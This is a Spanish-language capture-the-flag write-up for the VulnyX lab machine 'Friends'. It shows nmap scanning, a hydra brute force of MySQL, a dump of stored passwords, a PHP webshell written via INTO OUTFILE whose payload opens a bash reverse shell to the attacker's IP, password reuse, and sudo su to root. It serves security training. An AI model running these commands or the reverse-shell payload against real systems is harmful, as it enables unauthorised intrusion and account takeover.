cd ~/blog

~/writeups/vulnyx/22-friends.md

22 - Friends

easy Linux vulnyx 22-02-2025
MySQL brute forceMySQL INTO OUTFILE webshell (RCE)Credential reusesudo su Privesc
vulnyx.com

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.112
 nmap -sCV -p 22,80,3306 -oN 02-targeted.txt 192.168.1.112
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-22 14:46 -03
Nmap scan report for 192.168.1.112
Host is up (0.0013s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Friends
3306/tcp open  mysql   MariaDB 5.5.5-10.5.19
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.5.19-MariaDB-0+deb11u2
|   Thread ID: 9
|   Capabilities flags: 63486
|   Some Capabilities: LongColumnFlag, Support41Auth, DontAllowDatabaseTableColumn, ConnectWithDatabase, SupportsCompression, ODBCClient, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, SupportsTransactions, InteractiveClient, IgnoreSigpipes, FoundRows, Speaks41ProtocolNew, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: A^:E+DXk4][1#WpLiO/<
|_  Auth Plugin Name: mysql_native_password
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.04 seconds

El sitio muestra una imagen de Beavis y Butt-Head, así que usamos esos nombres como usuarios para hacer fuerza bruta contra MySQL (3306):

 hydra -L users.txt -P ~/Documentos/wordlists/rockyou.txt 192.168.1.112 mysql -t 64
...
[3306][mysql] host: 192.168.1.112   login: beavis   password: rocknroll
...

Nos conectamos y exploramos la base de datos friends, obteniendo credenciales de la tabla users:

 mariadb -h 192.168.1.112 -u beavis -p --ssl-verify-server-cert=OFF
Enter password: rocknroll
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| friends            |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+

MariaDB [(none)]> use fiends;
MariaDB [friends]> show tables;
+-------------------+
| Tables_in_friends |
+-------------------+
| users             |
+-------------------+

MariaDB [friends]> select * from users;
+------+----------+-----------+
| id   | username | password  |
+------+----------+-----------+
|    1 | beavis   | b3@v1$123 |
|    2 | butthead | BuTTh3@D! |
+------+----------+-----------+

Con la función load_file leemos el index.php y, en un comentario, descubrimos una ruta oculta (/M3t4LL1c@):

MariaDB [(none)]> select load_file('/var/www/html/index.php');
...
/*
print "For more Rock & Roll visit: /M3t4LL1c@ ";
*/
...

Como MySQL puede escribir archivos, usamos INTO OUTFILE para colocar una webshell PHP en esa ruta:

MariaDB [(none)]> select "<?php shell_exec(\"bash -c 'bash -i >& /dev/tcp/192.168.1.25/1234 0>&1'\"); ?>" into outfile "/var/www/html/M3t4LL1c@/pwned.php";

Accedemos a la webshell para obtener una reverse shell como www-data:

 ncat -nlvp 1234
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.112:50400.
bash: cannot set terminal process group (449): Inappropriate ioctl for device
bash: no job control in this shell
www-data@friends:/var/www/html/M3t4LL1c@$

Reutilizamos las credenciales de la base de datos para movernos al usuario butthead:

www-data@friends:/home$ su butthead
Password: BuTTh3@D!

Revisamos sus permisos sudo:

butthead@friends:~$ sudo -l
[sudo] password for butthead: BuTTh3@D!

Matching Defaults entries for butthead on friends:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User butthead may run the following commands on friends:
    (root) PASSWD: /usr/bin/su

Podemos ejecutar su como root, lo que nos da directamente una shell de root:

butthead@friends:~$ sudo su
root@friends:/home/butthead#

Obtenemos las flags y fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados